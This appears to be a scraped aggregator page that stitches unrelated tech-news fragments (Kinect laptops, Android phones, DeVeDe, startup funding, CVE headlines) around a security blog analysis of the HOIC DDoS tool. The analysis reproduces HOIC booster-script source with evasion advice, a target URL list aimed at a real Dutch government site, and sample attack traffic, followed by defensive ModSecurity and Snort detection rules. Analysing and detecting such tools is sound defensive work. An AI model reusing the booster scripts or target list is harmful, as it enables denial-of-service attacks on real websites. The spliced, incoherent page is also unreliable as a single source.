timeslive.co.za: It was a happy New Year’s Day for gang who pulled off…R42m Postbank heist

The Windows release of Kinect is coming up in a couple days, but for most people that won’t be a major event: the Kinect they have is sitting on their TV or in a drawer, waiting to be taken out for an impromptu Dance Central 2 party. Of the 10 million Kinects out there, the only ones connected to computers are the ones being fiddled with by the various hackers and students making science projects out the things.

But according to the Daily, Microsoft is hoping to remedy this particular situation by building Kinect sensors right into your laptops. TechCrunch alum Matt Hickey got to handle a pair of prototypes, which were confirmed to be official, not just one of the many experiments that hide within Microsoft’s various lairs.

Unfortunately the laptops were not ready for their debut and no pictures seem to have been permitted. But they are described as netbook-like, with a number of smaller sensors instead of a webcam, and what could be an IR LED at the bottom of the screen.

The inclusion of depth-sensing cameras on a laptop is an interesting idea, and if they can drive the price of the sensor array down, it might become a standard feature. Microsoft has clearly also been focusing on miniaturizing the Kinect hardware, as the bulky original would seem somewhat out of place on a petite netbook. Whether this smaller sensor set has the same capabilities as the larger isn’t clear and wasn’t discussed.

A smaller Kinect would also suggest that Microsoft’s next console, rumored to have Kinect built in, is nearing readiness. While many gaming industry insiders have discounted the idea that the next generation of consoles will be announced this year, the rumor mill says otherwise.

Computer World: What Megaupload’s Demise Teaches about Cloud Storage

CNBC: Supreme Court: Warrant Needed for GPS Tracking

Not only does it ship with Linux, It’s one of the most powerful 14″ laptops available. At first glance, the Alto 3880 will not strike envy into the hearts of any. Like any standard PC laptop, it’s dressed in glossy, molded plastic pieces. The design decisions here are almost certainly OEM driven as the laptop takes a 3-tone neutral color scheme that presents itself in a bit of an awkward way. The lid emulates a brushed metal look with an attractive ZaReason screen-print right in the center. This is the first of a couple nice touches on ZaReason’s behalf. If this unit is closed on your coffee table, your guests will probably ask you, “What’s a ZaReason?”. In this respect, I think it’s quite effective. The brushed metal look for laptop lids is a little dated now, so this will not trend well in the vanity department.

(Posted 27 Jan 2012 by aweber)

(Posted 27 Jan 2012 by falko)

Your daughter’s birthday was beautiful and you have lots of videos and pictures from the event that have to be organized in a nice-looking way. Your graduation party was a blast and you want to remember it properly. Whatever the occasion, whatever the content, a custom-created DVD will pack your memories nicely and will spike your geek cred because you created it and hey, it looks so cool. But what tool should you use? There are professional, paid-for programs that can help you in creating a DVD, but why use another OS and pay when you have free OSs and free software to do this? You can use the command-line approach from start to finish, but sometimes a GUI that will wrap around these utilities looks like a nicer solution. Such a solution is DeVeDe, and it even has a Windows version if you insist, but I will focus on Linux (of course!) in this article.

A task force in North Carolina recently ruled that survivors of that state’s eugenics program should be paid $50,000 each in financial compensation.

AdaCore Security Advisory SA-2012-L119-003 Hash collisions in AWS

Simple and Elegant is all I have to say about Xubuntu 11.10. I have done a short Video Review on Xubuntu 11.10. Fast and stable this *buntu favorite run extremely well in my Virtual Machine. Check out this short video and try Xubuntu for free today!

We took a break from the Android round-up in December because, well, to be honest I was on vacation. But January gave us a few extra smartphones and the holidays are over, so we’re back. What we’ve got for you today leans into more expensive turf, and unfortunately, our favorite Android devices for the past two months are also exclusively at Verizon, so Big Red subscribers should pay attention.

Without further ado, these are our favorite December/January releases of the Android persuasion: The Samsung Galaxy Nexus, the LG Spectrum, and the Motorola Droid RAZR Maxx.

Enjoy!

Samsung Galaxy Nexus

Features:

• Android 4.0 Ice Cream Sandwich
• Verizon 4G LTE support
• 4.65-inch 1280×720 Super AMOLED display
• 5MP rear camera (1080 video capture), 1.3MP front-facing camera (720p video capture)
• 1.2GHz dual-core processor
• MSRP: $299.99 with a two-year contract

Pros:

• Ice Cream Sandwich is a solid step up from Gingerbread
• That 720p display is huge and beautiful
• Google Hangouts

Cons:

• The phone might be a bit too big for one-handed actions
• Feels a bit plastic-y
• No pre-loaded Google wallet, but you can download it

If you’re looking for Android, the Galaxy Nexus is where you’ll find it. Ice Cream Sandwich is a joy compared to Gingerbread, and this coming from someone who is quite hard on Android. Of course, the screen on this bad boy is amazing, but as MG points out in his review, sometimes the phone is just too big to perform one-handed actions.

We also expected image quality to be better out of that 5-megapixel rear camera, but it simply can’t compete with the iPhone’s 8-megapixel shooter. (And no, I’m not saying that based on megapixels… Image quality is simply better with the 4S.) But that doesn’t really matter — an Android fan is an Android fan, and this is as good as Android gets.

LG Spectrum

Features:

• Android 2.3.5 Gingerbread
• Verizon 4G LTE support
• 4.5-inch True HD 1280×720 Display
• 8MP rear camera (1080p video capture), 1.3MP front-facing camera
• 1.5GHz dual-core processor
• MSRP: $199.99 with a two-year contract

Pros:

• Beautiful display
• Pre-loaded ESPN Sports Center app in HD
• LG Y is actually a nice custom overlay

Cons:

• Not a fan of that brushed plastic back panel
• The silver bezels don’t handle prints well

I was hard on this phone when I first played around with it, and I still maintain that there’s nothing super special about the Spectrum. It’s not like the Rezound with Beats Audio imtegration or the Razr with its anorexic waist line. That said, you really won’t find these kind of specs on an Android phone for just $200. In fact, I’d be so bold as to call it a steal.

I’m also pretty excited about that display. I have yet to put a Super AMOLED Plus up against this 720p True HD display, but I’d say it’s one of the most (if not, the most) stunning displays I saw at CES. Certainly worth consideration, especially if you are a fan of LG phones to begin with.

Motorola Droid Razr Maxx

Features:

• Android 2.3.5 Gingerbread
• Verizon 4G LTE support
• 4.3-inch Super AMOLED advanced 960×540 display
• 8MP rear camera (1080p video capture), 1.3MP front-facing camera (720p video capture)
• 1.2GHz dual-core processor
• MSRP: $299.99 with a two-year contract

Pros:

• 3300 mAH battery is a big improvement from the Razr
• Less of a “Moto bump” along the back
• Bump in storage from 16GB to 32GB

Cons:

• 1.89mm thicker than its predecessor
• UI can slow things down a tad

The Droid Razr Maxx is a very special phone. It kills the few things that were wrong with the original Razr — which is an excellent device, mind you — and then doubles the storage, to boot. I was originally bothered with how light the Razr was. It made premium materials feel cheap, but the extra heft and weight on the Razr Maxx really gives this phone a pricey, solid feel.

A Droid Razr update for Android 4.0 leaked out this week, so if you’re comfortable with tinkering than that’s an extra benefit to the Maxx. We’ll have a full review on this phone up very shortly, but from the short time I’ve spent with it thus far I’d say it has the superior hardware in this particular bunch of Android handsets.

It’ll all come down to what matters most to you. If that giant 720p screen excites you, go Galaxy Nexus all the way. The Spectrum, on the other hand, offers up some pretty killer specs at a much more reasonable price, while the Droid Razr Maxx wins in the hardware/design department.

QEMU KVM CVE-2012-0029 Local Privilege Escalation Vulnerability

Notice how the 11 comes before the ten. This does signify that eleven is, indeed, louder than ten. Everyone loves hating Unity. It’s new. It’s different. It’s pretty. It’s everything that Linux typically isn’t. People also love hating Ubuntu in general. While people struggle to make their Linux desktops look and feel more like OSX every day and there are over 9000 different OSX-like docks out there, people apparently really hate having something that looks and acts like an OSX desktop. It’s very odd.

In a previous blog post, we provided details of a DDoS attack tool called LOIC (Low Orbit Ion Canon) used by Anonymous and supports in denial of service attacks over the past year.  Attackers are constantly changing their tactics and tools in response to defender's actions.  Recently, the SANS Internet Storm Center (ISC) also highlighted a javascript verion of LOIC that, while generating the same attack traffic as our previous analysis showed, actually executed the attacks without the user "initiating" the attacks by pressing any buttons.

SpiderLabs has identified a new DDoS attack tool in circulation called HOIC (High Orbit Ion Canon).

While it seems that most of the dowload links have been removed by law enforcement agencies, we were able to obtain a copy and have conduct dynamic analysis on it.  Here are our findings.

HOIC Analysis

HOIC is an Windows executable file.  Once started, you will be presented with the following GUI screen:

If the attacker clicks on the + sign under TARGETS they get another pop-up box where you can specify target data.

The attacker can then specify the following Target data:

• URL – is the target website to attack
• Power -> sets the request velocity.  Initial testing shows the following:
  • Low = ~2 requests/sec for eacch THREAD defined on the main GUI
  • Mediem = ~4 requests/sec for each THREAD defined on the main GUI
  • High – ~8 requests/sec for each THREAD defined on the main GUI
• Booster – are config scripts that define the dynamic request attributes

After the attacker clicks on the Add button, they are taken back to the main screen.

The attacker can then adjust the THREADS number if desired to further increase the strength of the attack.  When they are ready to lauch the attack, they click on the "FIRE TEH LAZER!" button.  With the default settings shown above, the HTTP requests look like this:

GET / HTTP/1.0
Accept: */*
Accept-Language: en
Host: www.hoic_target_site.com

If the target web server was Apache, example access_log entries would look like this: 

72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"

What makes HOIC different from LOIC? 

Looking at this attack data, you may be asking yourself "How is HOIC different from LOIC?"  First of all, LOIC had both TCP and UDP DDoS attacks in addition to HTTP attacks were as HOIC is strictly an HTTP DoS tool.  The real difference, or enhancement, that HOIC has over LOIC is its use of what it calls "Booster Scripts."

Booster Scripts

This is taken directly from the HOIC DOCUMENTATION FOR HACKERS text file:

OK!

So BASICALLY

HOIC is pretty uselessUNLESS it is used incombination with "BOOSTERS", AKA "SCRIPTS"/BOOST PACKS / BOOM BOOM POWERThese boosters come in the form of .HOIC scripts.

hoic scripts are very simple and follow VB6 mixed with vb.net syntax although slightly alteredhere are the functions and globals that relate the HOIC:

booster -> This is a global variable that contains the contents of the current script (string)Headers -> This is a global variable that is an array of strings, and will be used to form headers in requests sent to the target URL.  To add a header, simply do something like this:Headers.Append("User-Agent: penis") or Headers.Append("User-Agent: penis x" + CStr(powerFactor)

lbIndex -> Index into list box (cant really be used outside of the program, useless to developers)PostBuffer -> String buffer containig post paramets, ie PostBuffer = "lol=2&lolxd=5"powerFactor -> Integer from 0-2, 0 being low, 1 being medium , 2 being hightotalbytessent -> a count of the number of bytes sent to the target already (presistent across each attack)URL -> url to attackUsePost -> boolean, true = uses post, otherwise itll use get

Let's take a look at a booster script called GenericBoost.hoic:

Dim useragents() as StringDim referers() as Stringdim randheaders() as string

// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate listuseragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer listreferers.Append "http://www.google.com/?q="+URLreferers.Append URLreferers.Append "http://www.google.com/"referers.Append "http://www.yahoo.com/"

// Add random headersrandheaders.Append "Cache-Control: no-cache"randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"randheaders.Append "If-Modified-Since: Tue, 18 Aug 2007 12:54:49 GMT"randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"

// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random refererHeaders.Append "Referer: " + referers(RndNumber(0, referers.UBound))// generate random user agent (DO NOT MODIFY THIS LINE)Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))// Generate random headersHeaders.Append randheaders(RndNumber(0, randheaders.UBound))

As you can see, the booster scripts set groups of various request header data including User-Agent, Referer and Cache-Control/If-Modified-Since data and will randomize the various combinations during attacks.  After specifying the GenericBoost.hoic script and re-launching the attack, you can see that these request items are no longer static and instead randomly rotate between these data pieces:

Example HOIC Attack Request #1

GET / HTTP/1.0Accept: */*Accept-Language: enReferer: http://www.hoic_target_site.com/User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMTHost: www.hoic_target_site.com

Example HOIC Attack Request #2

GET / HTTP/1.0Accept: */*Accept-Language: enReferer: http://www.yahoo.com/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMTHost: www.hoic_target_site.com

In addition to the GenericBoost.hoic file, there are two other scripts that target specific web sites.  One script is specifically targeting a government web site in retaliation for prosecuting someone for using LOIC is previous attacks.  The hoic file includes random URLs on the target website to hit:  

// populate rotating urls// IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organizationrandURLs.Append "http://www.om.nl/"randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"randURLs.Append "http://www.om.nl/vast_menu_blok/contact/"randURLs.Append "http://www.om.nl/actueel/nieuws-_en/"randURLs.Append "http://www.om.nl/actueel/columns/"randURLs.Append "http://www.om.nl/organisatie/"randURLs.Append "http://www.om.nl/actueel/omtv_0/"randURLs.Append "http://www.om.nl/"randURLs.Append "http://www.om.nl/?rss=true"randURLs.Append "http://www.om.nl/"randURLs.Append "http://www.om.nl/actueel/strafzaken/"randURLs.Append "http://www.om.nl/"randURLs.Append "http://www.om.nl/actueel/publicaties/"randURLs.Append "http://www.om.nl/organisatie/item_144364/"randURLs.Append "http://www.om.nl/"randURLs.Append "http://www.om.nl/onderwerpen/drugs/"randURLs.Append "http://www.om.nl/onderwerpen/commissie_evaluatie/"randURLs.Append "http://www.om.nl/actueel/agenda/"randURLs.Append "http://www.om.nl/actueel/strafzaken/"randURLs.Append "http://www.om.nl/onderwerpen/bouwfraude/"randURLs.Append "http://www.om.nl/onderwerpen/mensenhandel_en/"randURLs.Append "http://www.om.nl/onderwerpen/snelrecht_en/"randURLs.Append "http://www.om.nl/"randURLs.Append "http://www.om.nl/onderwerpen/voorkennis/"randURLs.Append "http://www.om.nl/actueel/agenda/"

By randomizing these request characteristics, it makes things more challenging for defenders to create defensive rules to identify the individual attack payloads.  While it does make detection more difficult, it is still possible.

HOIC Detection

While the HOIC requests try to evade detection through randomization techniques, there are still some request attributes which can be used for identification of attack traffic.  Most of these tell-tale signs are based on abnormalities vs. real web web browsers.

Generic DoS Detection

Before we discuss some of the unique identifiers of HOIC traffic, we wanted to make sure to highlight the generic detection of automated DoS detection through traffic velocity violations.  The OWASP ModSecurity Core Rule Set (CRS) has a denial of service detection rule set that can identify DoS attacks.  The ModSecurity admin only needs to activate the file and then edit the following directives in the modsecurity_crs_10_config.conf file:

## -=[ DoS Protection ]=-## If you are using the DoS Protection rule set, then uncomment the following# lines and set the following variables:# - Burst Time Slice Interval: time interval window to monitor for bursts# - Request Threshold: request # threshold to trigger a burst# - Block Period: temporary block timeout#SecAction "phase:1,id:'981215',t:none,nolog,pass, \setvar:'tx.dos_burst_time_slice=60', \setvar:'tx.dos_counter_threshold=100', \setvar:'tx.dos_block_timeout=600'"

When a HOIC attack is run against the ModSecurity site, the following alerts will be generated:

[Fri Jan 27 13:44:39 2012] [error] [client 192.168.1.103] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_11_dos_protection.conf"] [line "11"] [id "981044"]
[msg "Denial of Service (DoS) Attack Identified from 192.168.1.103 (237 hits since last alert)"] [hostname "192.168.1.100"] [uri "/"] [unique_id "TyLwl8CoAWQAATFkSFoAAAAG"]

These rules will initiate the drop action on all traffic from the attacker source and will provide periodic alerting with traffic stat counts).  Besides alerting on traffic velocity violations, there are a numbe of other HOIC-specific attributes that may prove useful in the short-term to uniquely identify the attack tool in use. 

HTTP Version and Host Header

All of the requests specify "HTTP/1.0" however they also include the "Host:" request header, which wasn't introduced until HTTP/1.1.  The Host header's main purpose was to help conserve IP address space by allowing name-based virtual hosting.  Without a Host header, each web site would have to have a unique IP address.

With this detection mechanism in mind, we can use the following ModSecurity rule to generically catch any HTTP/1.0 client that submits a Host header:

SecRule &REQUEST_HEADERS:Host "@eq 1" "chain,phase:1,t:none,log,block,msg:'HTTP v1.0 Client Anomaly - Host Header Sent.'"
   SecRule REQUEST_PROTOCOL "!@streq HTTP/1.1"

HTTP Request Header Ordering

While the request header names and payloads, in and of themselves, are valid, the order in which they are defined in the request do not match what normal web browsers would send.  Two good references for Browser Fingerpringing/Header Ordering are the Browser Recon Project and p0f3 (passive OS fingerprinting).

Browser Recon Project

The Browser Recon Project has a Header Order DB with info on a large number of HTTP clients.  The only limitation with this dataset is that it is quite old.  The last update was in June 2008.

p0f3

Michal Zalewski recently updated his Passive OS Finferprinting (p0s) tool to v3 which includes application layer fingerprinting capabilities.  This includes analysis of HTTP clients by means of header ordering analysis.  Here is a section of the p0f.fp file for HTTP Client Fingerprints for Microsoft's Internet Explorer and for Google's Chrome browsers:

; ----
; MSIE
; ----

label = s:!:MSIE:8 or newer
sys   = Windows
sig   = 1:Accept=[*/*],?Referer,?Accept-Language,User-Agent,Accept-Encoding=[gzip, deflate],Host,Connection=[Keep-Alive]:Keep-Alive,Accept-Charset,UA-CPU:(compatible; MSIE
sig   = 1:Accept=[*/*],?Referer,?Accept-Language,Accept-Encoding=[gzip, deflate],User-Agent,Host,Connection=[Keep-Alive]:Keep-Alive,Accept-Charset:(compatible; MSIE

label = s:!:MSIE:7
sys   = Windows
sig   = 1:Accept=[*/*],?Referer,?Accept-Language,UA-CPU,User-Agent,Accept-Encoding=[gzip, deflate],Host,Connection=[Keep-Alive]:Keep-Alive,Accept-Charset:(compatible; MSIE

; TODO: Check if this one ever uses Accept-Language, etc. Also try to find MSIE 5.

label = s:!:MSIE:6
sys   = Windows
sig   = 0:Accept=[*/*],?Referer,User-Agent,Host:Keep-Alive,Connection,Accept-Encoding,Accept-Language,Accept-Charset:(compatible; MSIE
sig   = 1:Accept=[*/*],Connection=[Keep-Alive],Host,?Pragma=[no-cache],?Range,?Referer,User-Agent:Keep-Alive,Accept-Encoding,Accept-Language,Accept-Charset:(compatible; MSIE

; ------
; Chrome; ------

label = s:!:Chrome:11 or newer
sys   = Windows,@unix
sig   = 1:Host,Connection=[keep-alive],User-Agent,Accept=[*/*],?Referer,Accept-Encoding=[gzip,deflate,sdch],Accept-Language,Accept-Charset=[utf-8;q=0.7,*;q=0.3]:: Chrom
sig   = 1:Host,Connection=[keep-alive],User-Agent,Accept=[*/*],?Referer,Accept-Encoding=[gzip,deflate,sdch],Accept-Language,Accept-Charset=[UTF-8,*;q=0.5]:: Chrom
sig   = 1:Host,User-Agent,Accept=[*/*],?Referer,Accept-Encoding=[gzip,deflate,sdch],Accept-Language,Accept-Charset=[utf-8;q=0.7,*;q=0.3],Connection=[keep-alive]::Chrom

By examining the valid header ordering shown here in p0f3, we can identify that the HOIC header ordering is abnormal.  The easiest charcteristing to notice is that, in HOIC, the Host header is always listed last in the header order while this is not the case in any legitimate browsers.

The following ModSecurity rule will inspect the current header odering of the client request and then alert if the Host header is listed last:

SecRule REQUEST_HEADERS_NAMES ".*" "chain,phase:1,t:none,log,block,msg:'Request Header Anomaly - Host Header Listed Last.',setvar:'tx.header_order=%{tx.header_order}, %{matched_var}'"
        SecRule TX:HEADER_ORDER "@endsWith , Host"

This rule uses ModSecurity's macro expansion capability to create a custom variable which captures the order of the request header names.  Here is an example from the debug log showing how this rule processing works:

Recipe: Invoking rule 1015de5c0; [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_15_custom.conf"] [line "1"].
Rule 1015de5c0: SecRule "REQUEST_HEADERS_NAMES" "@rx .*" "phase:1,chain,t:none,log,block,msg:'Request Header Anomaly - Host Header Listed Last.',setvar:'tx.header_order=%{t
x.header_order}, %{matched_var}'"
Expanded "REQUEST_HEADERS_NAMES" to "REQUEST_HEADERS_NAMES:Accept|REQUEST_HEADERS_NAMES:Accept-Language|REQUEST_HEADERS_NAMES:Referer|REQUEST_HEADERS_NAMES:User-Agent|REQUE
ST_HEADERS_NAMES:If-Modified-Since|REQUEST_HEADERS_NAMES:Host".
Transformation completed in 1 usec.
Executing operator "rx" with param ".*" against REQUEST_HEADERS_NAMES:Accept.
Target value: "Accept"
Operator completed in 2 usec.
Setting variable: tx.header_order=%{tx.header_order}, %{matched_var}
Resolved macro %{matched_var} to: Accept
Set variable "tx.header_order" to ", Accept".
Transformation completed in 0 usec.
Executing operator "rx" with param ".*" against REQUEST_HEADERS_NAMES:Accept-Language.
Target value: "Accept-Language"
Operator completed in 1 usec.
Setting variable: tx.header_order=%{tx.header_order}, %{matched_var}
Resolved macro %{tx.header_order} to: , Accept
Resolved macro %{matched_var} to: Accept-Language
Set variable "tx.header_order" to ", Accept, Accept-Language".
...
--CUT--
...
Executing operator "rx" with param ".*" against REQUEST_HEADERS_NAMES:Host.
Target value: "Host"
Operator completed in 1 usec.
Setting variable: tx.header_order=%{tx.header_order}, %{matched_var}
Resolved macro %{tx.header_order} to: , Accept, Accept-Language, Referer, User-Agent, If-Modified-Since
Resolved macro %{matched_var} to: Host
Set variable "tx.header_order" to ", Accept, Accept-Language, Referer, User-Agent, If-Modified-Since, Host".
Rule returned 1.
Match -> mode NEXT_RULE.
Recipe: Invoking rule 1015df398; [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_15_custom.conf"] [line "2"].
Rule 1015df398: SecRule "TX:HEADER_ORDER" "@endsWith , Host"
Transformation completed in 0 usec.
Executing operator "endsWith" with param ", Host" against TX:header_order.
Target value: ", Accept, Accept-Language, Referer, User-Agent, If-Modified-Since, Host"
Operator completed in 8 usec.
Warning. String match ", Host" at TX:header_order. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_15_custom.conf"] [line "1"] [msg "Request Header Anomaly - H
ost Header Listed Last."]

Leading Space Character Anomalies

Another interesting characteristic of HOIC traffic is that many of the Request Header payloads have leading double-spaces in them.  Look at this pcap capture in wireshark:

In this screenshot, we are highlighting the Keep-Alive field.  Notice that after the Header Name and semi-colon, that there is actually two space characters (20 20) before the 115 payload text in the hex window.  There are actually a number of headers that exhibit this behavior in this request.  After analyzing the varsious .hoic files included in the download, we determined that this can be reliably flagged on the User-Agent field as it is included with almost all requests.

We attempted to create a ModSecurity rule to detect this issue, however Apache is executing some pre-processing on the header values before passing this data off to ModSecurity and these leading space characters are not visible to ModSecurity.

If you are running Snort IDS, you can use the following rule (Thanks to SpiderLabs' Rodrigo Montoro) to detect this same traffic on the network prior to reaching the web server:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SLR Alert - HOIC Generic Detection with booster - HTTP 1.0 / Header Double Spacing";
flow:established,to_server; content:"User-Agent|3a 20 20|"; nocase; content:"HTTP/1|2e|0"; nocase; reference:url,blog.spiderlabs.com; threshold: type both, track by_src, count 15, seconds 30; classtype: slr-tw; sid:1; rev:1; )

Apache Tomcat AJP Protocol Security Bypass Vulnerability

Everyone should be backing up their data. This just doesn’t go towards sysadmins, but even people at home who never even think of it. Just like everything else in I.T., hard drives were built to fail. If you do not make efficient back ups, you are at your own mercy when your drive will no longer spin up, meaning all that data is now gone.

Y Combinator alum Curebit, an online customer referral platform that leverages social media for “word-of-mouth” advertising, has just raised $1.2 million in funding. The investors include 500 Startups, Karl Jacob, Auren Hoffman, Dharmesh Shah, Gordon Tucker, Alex Lloyd of Accelerator Ventures, and others.

The funding will be used for continued product development and a slight expansion to the team involving three new hires (two developers, one designer) to the company’s now five-person outfit.

Curebit, for those unfamiliar, works to optimize the referral systems for eCommerce platforms and software-as-a-service (SaaS) companies (See previous coverage here).

The startup offers a few different ways for businesses to take advantage of its tools, the first being a post-purchase campaign that allows customers to share the details of the purchase on Facebook, Twitter or via email, as soon as the transaction completes.

“We figured when’s a better time than when you’ve basically voted with your wallet, saying ‘hey, I like this store,’” explains Curebit Co-founder Allan Grant.

Companies can also use Curebit’s technology to build standalone referral pages that are accessible at any time, or in one-off campaigns meant to further the reach of existing referral programs.

The startup says it now around 1,000 customers, including everything from smaller, e-commerce stores to larger customers like Giggle.com and a newly signed (but unannounced) top 20 retailer and a consumer foods company. The technology is also available as a plugin for 14 platforms, including Shopify and Magento.

By leveraging social media for the word-of-mouth referrals, Curebit’s customers see higher clicks and conversions than in traditional campaigns, where, for example, customers may have come in by way of ads. The referrals are like personal recommendations from friends, and often include a benefit, like a discount for the new customer, or for both the new customer and the friend who’s doing the referring.

When either the customer or the friend gets a deal via the referral, Curebit is seeing 15%-25% share rates. When the deal is double-sided (both people benefit), share rates are 45%-65%. Meanwhile, only 3% share using the standalone share button. Curebit also sees 1 to 5 clicks per share, depending on the product.

More unique products seem to do better than commodity products, notes Grant. And Curebit’s conversion rates are generally 2 to 3 times higher than traditional methods, and, in some cases, have been as high as 30%. Even better, Curebit’s referrals pay off in terms of dollars spent at checkout, too.

“The other thing we’ve seen consistently on just about every single site is that people spend more,” says Grant. “The average order amount is higher, and it’s not just higher based on how much the discount is – it’s higher even beyond that, even when you take the discount out.”

It’s the personal nature of the Curebit-powered recommendation that’s freeing people up to spend, it seems.

This temperature display may not knock your socks off, but it’s a simple demonstration of how you can used vector graphics as a web readout for data (translated). [Luca] wrote this four page tutorial to help others, he makes it look really easy, and the sky’s the limit on eye candy once you get he basics in place.

The first step is to create the dynamic SVG (vector graphic) file using Inkscape that will be used by the webpage. This starts with a static background, in this case the grey parts of the thermometer which will not change. Over the top the blue parts were added, with just a bit of XML editing to give those parts a hook which will be used in the next step. The demo above will have a moving blue bar and changing numeric output to match data coming in from a temperature sensor.

An SVG file is just a text file that is rendered as a graphic when loaded. [Luca] shows you how to used the identifiers set up when making the graphic to dynamically change the size and value of the blue parts with server-side PHP before sending the graphic to the browser. With that in place you just need to give the PHP file access to the data. He shows how to use the Pachube API but you could just as easily get this via serial or otherwise.

Filed under: software hacks

Navy Times: Chinese virus targets DoD Common Access Card

arstechnica: "TWO *REAL* GUNS POINTED AT ME" – how the FBI raided Anonymous

Linux Kernel CVE-2012-0056 Local Privilege Escalation Vulnerability

Symantec pcAnywhere Insecure File Permissions Vulnerability

